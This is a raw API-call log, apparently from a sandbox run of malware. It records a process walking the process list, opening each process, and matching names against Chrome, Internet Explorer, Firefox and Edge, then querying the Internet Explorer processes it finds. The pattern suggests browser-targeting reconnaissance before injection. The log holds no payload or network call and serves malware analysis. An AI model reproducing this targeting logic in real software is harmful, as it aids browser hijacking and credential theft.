	[0215.684] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0215.685] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0215.685] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0215.685] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x45cc
	[0215.686] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.686] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0215.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.687] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.687] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0215.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.688] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.688] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0215.689] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x45d0
	[0215.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.689] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0215.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.690] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.690] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.690] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0215.690] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.690] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.690] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0215.691] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x45d4
	[0215.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.691] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0215.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.691] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.692] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0215.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.692] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.692] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0215.693] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x45d8
	[0215.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.693] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0215.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.694] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.694] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0215.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.694] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.695] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0215.695] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x45dc
	[0215.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.695] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0215.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.696] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.697] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0215.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.697] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.698] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0215.698] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x45e0
	[0215.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.699] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0215.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.699] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.699] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0215.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.700] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.700] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0215.700] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x45e4
	[0215.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.701] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0215.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.701] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.702] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0215.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.702] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.702] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0215.703] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x45e8
	[0215.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.703] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0215.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.704] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.704] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0215.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.705] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.705] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0215.706] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x45ec
	[0215.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.706] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0215.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.706] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.707] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0215.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.707] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.707] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0215.708] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x45f0
	[0215.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.708] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0215.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.708] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.708] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0215.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.709] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.709] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0215.709] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x45f4
	[0215.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.710] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0215.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.710] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.711] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0215.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.711] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.711] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0215.712] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x45f8
	[0215.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.712] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0215.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.713] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.714] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0215.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.714] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.715] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0215.715] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x45fc
	[0215.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.715] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0215.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.716] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.716] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0215.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.717] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.717] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0215.718] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x4600
	[0215.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.718] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0215.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.719] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.720] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0215.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.720] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.721] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0215.722] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x4604
	[0215.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.722] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0215.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.722] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.723] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0215.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.723] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.724] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0215.724] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x4608
	[0215.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.725] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0215.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.725] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0215.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.725] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0215.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.726] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.726] NtQueryInformationProcess (in: ProcessHandle=0x4608, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0215.726] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0215.726] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0215.727] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x460c
	[0215.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.727] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0215.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.728] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0215.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.728] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0215.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.728] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.729] NtQueryInformationProcess (in: ProcessHandle=0x460c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0215.729] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0215.729] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0215.730] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x4610
	[0215.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.730] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0215.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.730] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.730] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0215.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.731] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.731] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0215.732] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x4614
	[0215.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.732] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0215.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.732] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.733] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0215.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.733] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.733] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.734] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x4618
	[0215.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.734] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.734] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.735] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.735] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.735] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.736] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.737] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x461c
	[0215.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.737] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.737] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.738] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.738] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.738] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0215.739] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x468) returned 0x4620
	[0215.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.739] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.739] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.740] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.740] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.740] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.741] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x4624
	[0215.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.741] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.741] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.742] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.742] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.742] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0215.743] CloseHandle (hObject=0x188) returned 1
	[0215.743] Sleep (dwMilliseconds=0x64) 
	[0215.844] GetCurrentProcessId () returned 0x110
	[0215.844] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
